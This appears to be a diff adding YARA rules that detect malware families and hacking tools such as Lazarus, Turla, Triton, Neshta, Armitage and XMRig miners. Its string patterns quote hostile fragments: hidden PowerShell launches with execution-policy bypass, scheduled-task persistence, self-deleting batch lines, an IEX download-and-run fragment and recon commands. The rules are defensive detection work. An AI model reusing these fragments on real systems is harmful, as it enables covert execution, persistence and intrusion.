+      description = "Detects RGDoor backdoor used by OilRig group"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"
+      date = "2018-01-27 10:36:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a9c92b29ee05c1522715c7a2f9c543740b60e36373cb47b5620b1f3d8ad96bfa"
+      tags = "APT, DEMO, EXE, FILE, G0049, MAL, MIDDLE_EAST"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $c1 = { 00 63 6D 64 24 00 00 00 00 72 00 00 00 00 00 00 00 75 70 6C 6F
+              61 64 24 } 
+      $c2 = { 63 61 6E 27 74 20 6F 70 65 6E 20 66 69 6C 65 3A 20 00 00 00 00
+              00 00 00 64 6F 77 6E 6C 6F 61 64 24 } 
+      $s1 = "MyNativeModule.dll" fullword ascii
+      $s2 = "RGSESSIONID=" fullword ascii
+      $s3 = "download$" fullword ascii
+      $s4 = ".?AVCHelloWorld@@" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "47cb127aad6c7c9954058e61a2a6429a" or 1 of ( $c* ) or 2 of them )
+}
+
+rule Elise_Jan18_1_RID2B74 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Elise malware samples - fake Norton Security NavShExt.dll"
+      author = "Florian Roth"
+      reference = "https://twitter.com/blu3_team/status/955971742329135105"
+      date = "2018-01-24 09:07:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6dc2a49d58dc568944fef8285ad7a03b772b9bdf1fe4bddff3f1ade3862eae79"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "NavShExt.dll" fullword wide
+      $s2 = "Norton Security" fullword wide
+      $a1 = "donotbotherme" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and ( pe.imphash ( ) == "e9478ee4ebf085d1f14f64ba96ef082f" or ( 1 of ( $s* ) and $a1 ) )
+}
+
+rule MiniRAT_Gen_1_RID2B8E : DEMO EXE FILE GEN MAL {
+   meta:
+      description = "Detects Mini RAT malware"
+      author = "Florian Roth"
+      reference = "https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news"
+      date = "2018-01-22 09:11:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b"
+      hash2 = "b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d"
+      hash3 = "ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2"
+      tags = "DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Mini rat\\" ascii
+      $x2 = "\\Projects\\ali\\Clever Components v7\\" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
+}
+
+rule MAL_unspecified_Jan18_1_RID2F4A : DEMO MAL {
+   meta:
+      description = "Detects unspecified malware sample"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-01-19 11:50:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417"
+      tags = "DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+      $s2 = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1" fullword ascii
+      $s3 = "[Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
+      $s4 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b" fullword ascii
+      $s5 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
+      $s6 = "%s\\%s.bat" fullword ascii
+      $s7 = "DEL /s \"%s\" >nul 2>&1" fullword ascii
+   condition: 
+      filesize < 300KB and 2 of them
+}
+
+rule Turla_Mal_Script_Jan18_1_RID2FD7 : DEMO G0010 MAL RUSSIA SCRIPT T1064 {
+   meta:
+      description = "Detects Turla malicious script"
+      author = "Florian Roth"
+      reference = "https://ghostbin.com/paste/jsph7"
+      date = "2018-01-19 12:14:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc"
+      tags = "DEMO, G0010, MAL, RUSSIA, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".charCodeAt(i % " ascii
+      $s2 = "{WScript.Quit();}" fullword ascii
+      $s3 = ".charAt(i)) << 10) |" ascii
+      $s4 = " = WScript.Arguments;var " ascii
+      $s5 = "= \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var i;" ascii
+   condition: 
+      filesize < 200KB and 2 of them
+}
+
+rule MAL_Neshta_Generic_RID2DC9 : DEMO EXE FILE GEN HIGHVOL MAL {
+   meta:
+      description = "Detects Neshta malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-01-15 10:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-04-14"
+      hash1 = "27c67eb1378c2fd054c6649f92ec8ee9bfcb6f790224036c974f6c883c46f586"
+      hash1 = "27c67eb1378c2fd054c6649f92ec8ee9bfcb6f790224036c974f6c883c46f586"
+      hash2 = "b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb"
+      hash3 = "1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb"
+      tags = "DEMO, EXE, FILE, GEN, HIGHVOL, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "the best. Fuck off all the rest." 
+      $x2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
+      $s1 = "Neshta" ascii fullword
+      $s2 = "Made in Belarus. " ascii fullword
+      $op1 = { 85 c0 93 0f 85 62 ff ff ff 5e 5b 89 ec 5d c2 04 } 
+      $op2 = { e8 e5 f1 ff ff 8b c3 e8 c6 ff ff ff 85 c0 75 0c } 
+      $op3 = { eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 34 } 
+      $sop1 = { e8 3c 2a ff ff b8 ff ff ff 7f eb 3e 83 7d 0c 00 } 
+      $sop2 = { 2b c7 50 e8 a4 40 ff ff ff b6 88 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or all of ( $s* ) or 3 of them or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" )
+}
+
+rule NK_Miner_Malware_Jan18_1_RID2F9D : DEMO EXE FILE MAL NK {
+   meta:
+      description = "Detects Noth Korean Monero Miner mentioned in AlienVault report"
+      author = "Florian Roth (original rule by Chris Doman)"
+      reference = "https://goo.gl/PChE1z"
+      date = "2018-01-09 12:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0024e32c0199ded445c0b968601f21cc92fc0c534d2642f2dd64c1c978ff01f3"
+      hash2 = "42300b6a09f183ae167d7a11d9c6df21d022a5f02df346350d3d875d557d3b76"
+      tags = "DEMO, EXE, FILE, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x0 = "c:\\users\\jawhar\\documents\\" ascii
+      $x1 = "C:\\Users\\Jawhar\\documents\\" ascii
+      $x2 = "The number of processors on this computer is {0}." fullword wide
+      $x3 = { 00 00 1F 43 00 3A 00 5C 00 4E 00 65 00 77 00 44
+              00 69 00 72 00 65 00 63 00 74 00 6F 00 72 00 79
+              00 00 } 
+      $x4 = "Le fichier Hello txt n'existe pas" fullword wide
+      $x5 = "C:\\NewDirectory2\\info2" fullword wide
+      $a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" ascii
+      $b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" ascii
+      $c = "barjuok.ryongnamsan.edu.kp" wide ascii
+      $d = "C:\\SoftwaresInstall\\soft" wide ascii
+      $e = "C:\\Windows\\Sys64\\intelservice.exe" wide ascii
+      $f = "C:\\Windows\\Sys64\\updater.exe" wide ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
+}
+
+rule CoinHive_Javascript_MoneroMiner_RID3366 : DEMO HIGHVOL SUSP {
+   meta:
+      description = "Detects CoinHive - JavaScript Crypto Miner"
+      author = "Florian Roth"
+      reference = "https://coinhive.com/documentation/miner"
+      date = "2018-01-04 14:46:11"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HIGHVOL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "CoinHive.CONFIG.REQUIRES_AUTH" fullword ascii
+   condition: 
+      filesize < 65KB and 1 of them
+}
+
+rule CoinMiner_Strings_RID2DDE : DEMO HIGHVOL SCRIPT SUSP {
+   meta:
+      description = "Detects mining pool protocol string in Executable"
+      author = "Florian Roth"
+      reference = "https://minergate.com/faq/what-pool-address"
+      date = "2018-01-04 10:50:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-10-26"
+      tags = "DEMO, HIGHVOL, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = "stratum+tcp://" ascii
+      $sa2 = "stratum+udp://" ascii
+      $sb1 = "\"normalHashing\": true," 
+   condition: 
+      filesize < 3000KB and 1 of them
+}
+
+rule XMRIG_Monero_Miner_RID2DC1 : DEMO EXE FILE HIGHVOL SUSP {
+   meta:
+      description = "Detects Monero mining software"
+      author = "Florian Roth"
+      reference = "https://github.com/xmrig/xmrig/releases"
+      date = "2018-01-04 10:45:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-11-10"
+      hash1 = "5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0"
+      hash2 = "08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7"
+      hash3 = "f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5"
+      tags = "DEMO, EXE, FILE, HIGHVOL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "'h' hashrate, 'p' pause, 'r' resume" fullword ascii
+      $s2 = "--cpu-affinity" ascii
+      $s3 = "set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" ascii
+      $s4 = "password for mining server" fullword ascii
+      $s5 = "XMRig/%s libuv/%s%s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d or uint16 ( 0 ) == 0x457f ) and filesize < 10MB and 2 of them
+}
+
+rule XMRIG_Monero_Miner_Config_RID3076 : DEMO FILE SUSP {
+   meta:
+      description = "Semiautomatically generated YARA rule - from files config.json, config.json"
+      author = "Florian Roth"
+      reference = "https://github.com/xmrig/xmrig/releases"
+      date = "2018-01-04 12:40:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "031333d44a3a917f9654d7e7257e00c9d961ada3bee707de94b7c7d06234909a"
+      hash2 = "409b6ec82c3bdac724dae702e20cb7f80ca1e79efa4ff91212960525af016c41"
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "\"cpu-affinity\": null,   // set process affinity to CPU core(s), mask \"0x3\" for cores 0 and 1" fullword ascii
+      $s5 = "\"nicehash\": false                  // enable nicehash/xmrig-proxy support" fullword ascii
+      $s8 = "\"algo\": \"cryptonight\",  // cryptonight (default) or cryptonight-lite" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x0a7b or uint16 ( 0 ) == 0x0d7b ) and filesize < 5KB and 1 of them
+}
+
+rule VBS_dropper_script_Dec17_1_RID30AE : DEMO MAL SCRIPT T1064 {
+   meta:
+      description = "Detects a supicious VBS script that drops an executable"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-01-01 12:50:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "TVpTAQEAAAAEAA" 
+      $s2 = "TVoAAAAAAAAAAA" 
+      $s3 = "TVqAAAEAAAAEAB" 
+      $s4 = "TVpQAAIAAAAEAA" 
+      $s5 = "TVqQAAMAAAAEAA" 
+      $a1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+   condition: 
+      filesize < 600KB and $a1 and 1 of ( $s* )
+}
+
+rule RemCom_RemoteCommandExecution_RID3292 : DEMO HKTL T1077 {
+   meta:
+      description = "Detects strings from RemCom tool"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tezXZt"
+      date = "2017-12-28 14:10:51"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1077"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "\\\\.\\pipe\\%s%s%d" 
+      $ = "%s\\pipe\\%s%s%d%s" 
+      $ = "\\ADMIN$\\System32\\%s%s" 
+   condition: 
+      1 of them
+}
+
+rule PowerShell_Suite_Hacktools_Gen_Strings_RID3648 : DEMO GEN SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects strings from scripts in the PowerShell-Suite repo"
+      author = "Florian Roth"
+      reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
+      date = "2017-12-27 16:49:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "79071ba5a984ee05903d566130467483c197cbc2537f25c1e3d7ae4772211fe0"
+      hash2 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
+      hash3 = "4f51e7676a4d54c1962760ca0ac81beb28008451511af96652c31f4f40e8eb8e"
+      tags = "DEMO, GEN, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "[!] NtCreateThreadEx failed.." fullword ascii
+      $ = "[?] Executing mmc.." ascii
+      $ = "[!] This method is only supported on 64-bit!" fullword ascii
+      $ = "$LNK = [ShellLink.Shortcut]::FromByteArray($LNKHeader.GetBytes())" fullword ascii
+      $ = "$CallResult = [UACTokenMagic]::TerminateProcess($ShellExecuteInfo.hProcess, 1)" fullword ascii
+      $ = "[!] Unable to open process (as Administrator), this may require SYSTEM access." fullword ascii
+      $ = "[!] Error, NTSTATUS Value: " ascii
+      $ = "[!] UAC artifact: " ascii
+      $ = "[>] Process dump success!" ascii
+      $ = "[!] Process dump failed!" ascii
+      $ = "[+] Eidolon entry point:" fullword ascii
+      $ = "Wait for shellcode to run" fullword ascii
+      $ = "$Command = Read-Host \"`nSMB shell\"" fullword ascii
+      $ = "Use Netapi32::NetSessionEnum to enumerate active sessions on domain joined machines." fullword ascii
+      $ = "Invoke-CreateProcess -Binary C:\\Windows\\System32\\" ascii
+      $ = "[?] Thread belongs to: " ascii
+      $ = "[?] Operating system core count: " ascii
+      $ = "[>] Calling Advapi32::LookupPrivilegeValue --> SeDebugPrivilege" fullword ascii
+      $ = "Calling Advapi32::OpenProcessToken --> LSASS" ascii
+      $ = "[!] Mmm, something went wrong! GetLastError returned:" ascii
+      $ = "if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')" fullword ascii
+   condition: 
+      filesize < 100KB and 1 of them
+}
+
+rule PowerShell_Suite_Eidolon_RID30A8 : DEMO FILE SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects PowerShell Suite Eidolon script - file Start-Eidolon.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
+      date = "2017-12-27 12:49:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
+      tags = "DEMO, FILE, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "[+] Eidolon entry point:" ascii
+      $ = "C:\\PS> Start-Eidolon -Target C:\\Some\\File.Path -Mimikatz -Verbose" fullword ascii
+      $ = "[Int16]$PEArch = '0x{0}' -f ((($PayloadBytes[($OptOffset+1)..($OptOffset)]) | % {$_.ToString('X2')}) -join '')" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x7566 and filesize < 13000KB and 1 of them
+}
+
+rule Armitage_MeterpreterSession_Strings_RID3556 : DEMO HKTL {
+   meta:
+      description = "Detects Armitage component"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-12-24 16:08:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2020-05-19"
+      hash1 = "b258b2f12f57ed05d8eafd29e9ecc126ae301ead9944a616b87c240bf1e71f9a"
+      hash2 = "144cb6b1cf52e60f16b45ddf1633132c75de393c2705773b9f67fce334a3c8b8"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "session.meterpreter_read" fullword ascii
+      $s2 = "sniffer_dump" fullword ascii
+      $s3 = "keyscan_dump" fullword ascii
+      $s4 = "MeterpreterSession.java" fullword ascii
+   condition: 
+      filesize < 30KB and 1 of them
+}
+
+rule Armitage_OSX_RID2B94 : DEMO HKTL MACOS {
+   meta:
+      description = "Detects Armitage component"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-12-24 09:12:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2680d9900a057d553fcb28d84cdc41c3fc18fd224a88a32ee14c9c1b501a86af"
+      hash2 = "b7b506f38d0553cd2beb4111c7ef383c821f04cee5169fed2ef5d869c9fbfab3"
+      tags = "DEMO, HKTL, MACOS"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "resources/covertvpn-injector.exe" fullword ascii
+      $s10 = "resources/browserpivot.x64.dll" fullword ascii
+      $s17 = "resources/msfrpcd_new.bat" fullword ascii
+   condition: 
+      filesize < 6000KB and 1 of them
+}
+
+rule Lazarus_Dec_17_1_RID2CB5 : APT DEMO FILE G0032 MAL NK T1223 {
+   meta:
+      description = "Detects Lazarus malware from incident in Dec 2017"
+      author = "Florian Roth"
+      reference = "https://goo.gl/8U6fY2"
+      date = "2017-12-20 10:00:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d5f9a81df5061c69be9c0ed55fba7d796e1a8ebab7c609ae437c574bd7b30b48"
+      tags = "APT, DEMO, FILE, G0032, MAL, NK, T1223"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "::DataSpace/Storage/MSCompressed/Transform/" ascii
+      $s2 = "HHA Version 4." ascii
+      $s3 = { 74 45 58 74 53 6F 66 74 77 61 72 65 00 41 64 6F
+              62 65 20 49 6D 61 67 65 52 65 61 64 79 71 } 
+      $s4 = "bUEeYE" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5449 and filesize < 4000KB and all of them
+}
+
+rule Lazarus_Dec_17_2_RID2CB6 : APT DEMO EXE FILE G0032 MAL NK {
+   meta:
+      description = "Detects Lazarus malware from incident in Dec 2017"
+      author = "Florian Roth"
+      reference = "https://goo.gl/8U6fY2"
+      date = "2017-12-20 10:00:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cbebafb2f4d77967ffb1a74aac09633b5af616046f31dddf899019ba78a55411"
+      hash2 = "9ca3e56dcb2d1b92e88a0d09d8cab2207ee6d1f55bada744ef81e8b8cf155453"
+      tags = "APT, DEMO, EXE, FILE, G0032, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SkypeSetup.exe" fullword wide
+      $s2 = "%s\\SkypeSetup.exe" fullword ascii
+      $s3 = "Skype Technologies S.A." fullword wide
+      $a1 = "Microsoft Code Signing PCA" ascii wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 7000KB and ( all of ( $s* ) and not $a1 )
+}
+
+rule Lazarus_Dec_17_4_RID2CB8 : APT DEMO G0032 MAL NK {
+   meta:
+      description = "Detects Lazarus malware from incident in Dec 2017ithumb.js"
+      author = "Florian Roth"
+      reference = "https://goo.gl/8U6fY2"
+      date = "2017-12-20 10:01:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8ff100ca86cb62117f1290e71d5f9c0519661d6c955d9fcfb71f0bbdf75b51b3"
+      hash2 = "7975c09dd436fededd38acee9769ad367bfe07c769770bd152f33a10ed36529e"
+      tags = "APT, DEMO, G0032, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "var _0xf5ed=[\"\\x57\\x53\\x63\\x72\\x69\\x70\\x74\\x2E\\x53\\x68\\x65\\x6C\\x6C\"," ascii
+   condition: 
+      filesize < 9KB and 1 of them
+}
+
+rule Lazarus_Dec_17_5_RID2CB9 : APT DEMO G0032 MAL NK T1033 T1053 {
+   meta:
+      description = "Detects Lazarus malware from incident in Dec 2017"
+      author = "Florian Roth"
+      reference = "https://goo.gl/8U6fY2"
+      date = "2017-12-20 10:01:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471"
+      tags = "APT, DEMO, G0032, MAL, NK, T1033, T1053"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList" fullword ascii
+      $x2 = "$respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;" fullword ascii
+      $x3 = "[String]$PS_PATH = \"C:\\\\Users\\\\Public\\\\Documents\\\\ProxyAutoUpdate.ps1\";" fullword ascii
+      $x4 = "$cmdSchedule = 'schtasks /create /tn \"ProxyServerUpdater\"" ascii
+      $x5 = "/tr \"powershell.exe -ep bypass -windowstyle hidden -file " ascii
+      $x6 = "C:\\\\Users\\\\Public\\\\Documents\\\\tmp' + -join " ascii
+      $x7 = "$cmdResult = cmd.exe /c $cmdInst | Out-String;" fullword ascii
+      $x8 = "whoami /groups | findstr /c:\"S-1-5-32-544\"" fullword ascii
+   condition: 
+      filesize < 500KB and 1 of them
+}
+
+rule Invoke_PSImage_RID2C62 : DEMO SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects a command to execute PowerShell from String"
+      author = "Florian Roth"
+      reference = "https://github.com/peewpw/Invoke-PSImage"
+      date = "2017-12-16 09:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "IEX([System.Text.Encoding]::ASCII.GetString(" ascii wide
+      $ = "System.Drawing.Bitmap((a Net.WebClient).OpenRead(" ascii wide
+      $ = { 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
+            00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9
+            E8 00 00 00 09 70 48 59 73 00 00 19 D6 00 00 19
+            D6 01 18 D1 CA ED 00 00 00 07 74 49 4D 45 07 E1
+            0C 0F 13 1E 36 89 C4 28 BF 00 00 00 07 74 45 58
+            74 41 75 74 68 6F 72 00 A9 AE CC 48 00 00 00 0C
+            74 45 58 74 44 65 73 63 72 69 70 74 69 6F 6E 00
+            13 09 21 23 00 00 00 0A 74 45 58 74 43 6F 70 79
+            72 69 67 68 74 00 AC 0F CC 3A 00 00 00 0E 74 45
+            58 74 43 72 65 61 74 69 6F 6E 20 74 69 6D 65 00
+            35 F7 0F } 
+   condition: 
+      filesize < 3000KB and 1 of them
+}
+
+rule Suspicious_AutoIt_by_Microsoft_RID334C : DEMO EXE FILE SCRIPT SUSP {
+   meta:
+      description = "Detects a AutoIt script with Microsoft identification"
+      author = "Florian Roth"
+      reference = "Internal Research - VT"
+      date = "2017-12-14 14:41:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c0cbcc598d4e8b501aa0bd92115b4c68ccda0993ca0c6ce19edd2e04416b6213"
+      tags = "DEMO, EXE, FILE, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Microsoft Corporation. All rights reserved" fullword wide
+      $s2 = "AutoIt" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule Triton_trilog_RID2C81 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Triton APT malware - file trilog.exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/vtQoCQ"
+      date = "2017-12-14 09:52:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e8542c07b2af63ee7e72ce5d97d91036c5da56e2b091aa2afe737b224305d230"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "inject.bin" ascii
+      $s2 = "PYTHON27.DLL" fullword ascii
+      $s3 = "payload" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them
+}
+
+rule ZXshell_20171211_chrsben_RID2F0D : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects ZxShell variant surfaced in Dec 17"
+      author = "Florian Roth"
+      reference = "https://goo.gl/snc85M"
+      date = "2017-12-11 11:40:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dd01e7a1c9b20d36ea2d961737780f2c0d56005c370e50247e38c5ca80dcaa4f"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "ncProxyXll" fullword ascii
+      $s1 = "Uniscribe.dll" fullword ascii
+      $s2 = "GetModuleFileNameDll" fullword ascii
+      $s4 = "$Hangzhou Shunwang Technology Co.,Ltd0" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "de481441d675e9aca4f20bd8e16a5faa" or pe.exports ( "PerfectWorld" ) or pe.exports ( "ncProxyXll" ) or 1 of ( $x* ) or 2 of them )
+}
+
+rule ReconCommands_in_File_RID2F4F : DEMO SUSP T1007 T1033 T1057 T1082 {
+   meta:
+      description = "Detects various recon commands in a single file"
+      author = "Florian Roth"
+      reference = "https://twitter.com/haroonmeer/status/939099379834658817"
+      date = "2017-12-11 11:51:41"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      tags = "DEMO, SUSP, T1007, T1033, T1057, T1082"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "tasklist" 
+      $ = "net time" 
+      $ = "systeminfo" 
+      $ = "whoami" 
+      $ = "nbtstat" 
+      $ = "net start" 
+      $ = "qprocess" 
+      $ = "nslookup" 
+   condition: 
+      filesize < 5KB and 4 of them
+}
+
+rule xRAT_1_RID2900 : APT DEMO EXE FILE G0040 MAL {
+   meta:
+      description = "Detects Patchwork malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/Pg3P4W"
+      date = "2017-12-11 19:45:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b"
+      hash2 = "f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a"
+      tags = "APT, DEMO, EXE, FILE, G0040, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\" -CHECK & PING -n 2 127.0.0.1 & EXIT" fullword wide
+      $x2 = "xClient.Core.Elevation" fullword ascii
+      $x3 = ">> Welcome to MAX-Shell :Session created" fullword wide
+      $x4 = "xClient.Properties.Resources.resources" fullword ascii
+      $x5 = "<description>My UAC Compatible application</description>" fullword ascii
+      $s1 = "ping -n 20 localhost > nul" fullword wide
